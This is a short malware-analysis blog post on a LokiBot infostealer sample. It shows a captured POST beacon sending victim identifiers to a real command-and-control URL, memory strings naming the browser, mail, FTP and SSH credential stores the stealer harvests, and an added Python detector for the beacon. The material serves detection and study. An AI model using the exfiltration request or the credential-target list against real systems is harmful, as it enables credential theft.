Thursday, April 12, 2018

lokibot sample

Just found in the recent submissions on Hybrid Analysis:
https://www.reverse.it/sample/c2678090c55db4f1b39e4d8987b6f3ca6651615fcaae46452f08cad1e8fc6291?environmentId=100
#lokibot

------------

closes itself and re-opens another executable with the same name

------------
interesting packet captures
------------
1.) Domain Name System (response)
    Queries
        kox.termofoc.gr: type A, class IN
    Answers
            Address: 198.12.153.138
2.) POST /oki/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: kox.termofoc.gr
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E5CE4ED4
Content-Length: 227
Connection: close

..'.......ckav.ru.....[REDACTED USER ID] .......[REDACTED PC NAME].......[REDACTED PC NAME].....................k...........:.....0...2.7.1.8.4.5.3.1.A.2.C.7.0.B.8.D.E.A.0.4.0.E.E.7.....vQURz).....H......ht.ps8:/.w..rerv....it.log.n..`.
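As an added example (not from the original post): a small Python checker that pulls the beacon traits out of a raw HTTP request, so a proxy log or pcap-extracted request can be tested for the same pattern. The header values are the ones in the capture above; the two sample requests are constructed, and the trait names and the "two traits" threshold are my own choice.

```python
"""Flag HTTP requests that carry the LokiBot beacon traits seen in the capture."""

# Values from the capture above; they fit the printf-style template seen in memory at 0x247168.
LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"
LOKI_PATH_SUFFIX = "/fre.php"

def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, version, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:                      # not a request line we understand
        return "", "", "", {}, body
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:                              # header names compared case-insensitively
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], parts[2], headers, body

def lokibot_indicators(raw: str) -> list:
    """Return the beacon traits present in the request, in a fixed order."""
    method, path, _version, headers, _body = parse_request(raw)
    hits = []
    if headers.get("user-agent") == LOKI_USER_AGENT:
        hits.append("charon-inferno user-agent")
    if "content-key" in headers:             # non-standard header used by the sample
        hits.append("content-key header")
    if method == "POST" and path.endswith(LOKI_PATH_SUFFIX):
        hits.append("post to fre.php")
    if (headers.get("content-type") == "application/octet-stream"
            and headers.get("content-encoding", "").lower() == "binary"):
        hits.append("binary octet-stream body")
    return hits

def is_lokibot_beacon(raw: str) -> bool:
    """Require two independent traits so a single coincidental header does not fire."""
    return len(lokibot_indicators(raw)) >= 2

# Constructed sample requests (the real body is the blob shown in the capture above).
BEACON = ("POST /oki/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
          "Host: kox.termofoc.gr\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\n"
          "Content-Encoding: binary\r\nContent-Key: E5CE4ED4\r\nContent-Length: 4\r\n"
          "Connection: close\r\n\r\nxxxx")
BENIGN = ("POST /api/upload HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0)\r\n"
          "Host: example.com\r\nContent-Type: application/octet-stream\r\n"
          "Content-Length: 4\r\n\r\nxxxx")
```

Running `is_lokibot_beacon(BEACON)` returns True with all four traits listed, while the benign upload returns no hits.
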
------------
interesting strings found in memory
------------
0x247168 (115): HTTP/1.0
User-Agent: %s
Host: %s
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
0x247fb0 (231): i/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: kox.termofoc.gr
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
0x415524 (26): Comodo\Dragon
0x415540 (44): MapleStudio\ChromePlus
0x415570 (26): Google\Chrome
0x4155d4 (26): Titan Browser
0x4155fc (40): Yandex\YandexBrowser
0x415628 (40): Epic Privacy Browser
0x415654 (28): CocCoc\Browser
0x415684 (30): Comodo\Chromodo
0x4156b8 (26): Coowon\Coowon
0x4156d4 (30): Mustang Browser
0x4156f4 (36): 360Browser\Browser
0x41571c (40): CatalinaGroup\Citrio
0x415748 (34): Google\Chrome SxS
0x41578c (44): \Opera\Opera Next\data
0x4157bc (56): \Opera Software\Opera Stable
0x4157f8 (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
0x415860 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
0x415ba0 (62): %s\Mozilla\Firefox\profiles.ini
0x415be0 (60): %s\Mozilla\Firefox\Profiles\%s
0x415c20 (66): %s\Mozilla\SeaMonkey\profiles.ini
0x415c68 (64): %s\Mozilla\SeaMonkey\Profiles\%s
0x415cac (58): %s\Flock\Browser\profiles.ini
0x415ce8 (56): %s\Flock\Browser\Profiles\%s
0x415d24 (54): %s\Thunderbird\profiles.ini
0x415d5c (52): %s\Thunderbird\Profiles\%s
0x415d94 (48): %s\K-Meleon\profiles.ini
0x415dc8 (28): %s\K-Meleon\%s
0x415de8 (64): %s\Comodo\IceDragon\profiles.ini
0x415e30 (62): %s\Comodo\IceDragon\Profiles\%s
0x415e70 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
0x415ed0 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
0x415f2c (46): %s\Postbox\profiles.ini
0x415f5c (44): %s\Postbox\Profiles\%s
0x415f90 (74): %s\8pecxstudios\Cyberfox\profiles.ini
0x415fe0 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
0x416030 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
0x416090 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
0x4160f0 (50): %s\FossaMail\profiles.ini
0x416124 (48): %s\FossaMail\Profiles\%s
0x416158 (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
0x417120 (28): IMAP Password2
0x417140 (28): NNTP Password2
0x417160 (36): HTTPMail Password2
0x417188 (28): SMTP Password2
0x4171a8 (26): POP3 Password
0x4173d0 (30): %s\32BitFtp.TMP
0x4173f0 (30): %s\32BitFtp.ini
0x417410 (54): %s\Estsoft\ALFTP\ESTdb2.dat
0x417448 (22): %s\site.xml
0x417460 (46): %s\BitKinex\bitkinex.ds
0x4174ac (30): LastUsedProfile
0x4174cc (56): Software\Bitvise\BvSshClient
0x417508 (40): %s\BlazeFtp\site.dat
0x417538 (72): Software\FlashPeak\BlazeFtp\Settings
0x417584 (24): LastPassword
0x4175b4 (22): LastAddress
0x417618 (88): Software\NCH Software\ClassicFTP\FTPAccounts
0x417694 (24): %s\Cyberduck
0x4176b0 (22): user.config
0x4176c8 (30): %s\iterate_GmbH
0x4176e8 (30): %s\EasyFTP\data
0x4181b8 (64): Software\9bis.com\KiTTY\Sessions
0x418200 (70): Software\SimonTatham\PuTTY\Sessions
0x418438 (22): %s\SmartFTP
0x418460 (44): %s\Staff-FTP\sites.ini
0x418490 (44): %s\Steed\bookmarks.txt
0x4184c0 (26): %s\SuperPutty
0x4189b0 (164): 

aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.

More information: http://www.ibsensoftware.com/
0x4a0074 (35): https://kox.termofoc.gr/oki/fre.php
